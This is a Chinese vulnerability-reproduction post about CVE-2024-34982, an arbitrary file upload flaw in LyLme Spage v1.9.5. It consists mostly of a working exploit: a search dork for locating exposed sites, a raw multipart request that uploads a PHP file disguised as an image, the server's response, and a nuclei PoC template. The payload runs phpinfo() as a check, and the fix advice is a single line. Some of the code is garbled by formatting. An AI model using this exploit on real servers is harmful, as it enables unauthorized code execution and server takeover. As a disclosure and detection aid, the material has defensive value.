免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
六零导航页 file.php 任意文件上传漏洞
02
—
漏洞影响
六零导航页 (LyLme Spage) v1.9.5
03
—
漏洞描述
六零导航页 (LyLme Spage) 致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。该系统file.php接口处存在任意文件上传漏洞,可能导致服务器失陷。
04
—
title=="上网导航 - LyLme Spage"
05
—
漏洞复现
发送数据包上传文件
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest
-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png
__FILE__); phpinfo();unlink(
-----------------------------qttl7vemrsold314zg0f--
响应内容如下,其中url是回显文件
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Encoding: gzip
Content-Type: application/json
Date: Mon, 20 May 2024 02:39:57 GMT
Server: nginx
Vary: Accept-Encoding
{"code": "200","msg":"上传成功","url":"/files/upload/img_664ab7fd14d2c.php"}
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
漏洞复现成功
06
—
nuclei poc
poc文件内容如下
id: CVE-2024-34982
info:
name: 六零导航页 file.php 任意文件上传漏洞
author: fgz
severity: critical
description: '六零导航页 (LyLme Spage) 致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。该系统file.php接口处存在任意文件上传漏洞,可能导致服务器失陷。'
tags: 2024,uploadfile
metadata:
1 :
title=="上网导航 - LyLme Spage" :
verified: true
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
raw:
|-
POST /include/file.php HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 :
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
XMLHttpRequest :
Accept: application/json, text/javascript, */*; q=0.01
multipart/form-data; boundary=---------------------------{{boundary}} :
gzip, deflate, br :
-----------------------------{{boundary}}
form-data; name="file"; filename="test.php" :
image/png :
phpinfo();unlink(__FILE__);?>
-----------------------------{{boundary}}--
|
GET {{name}} HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 :
extractors:
type: json
part: body
name: name
json:
'.url'
internal: true
matchers:
type: dsl
dsl:
"status_code_1 == 200 && status_code_2 == 200 && contains(body_2, 'PHP Version')"
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-34982漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论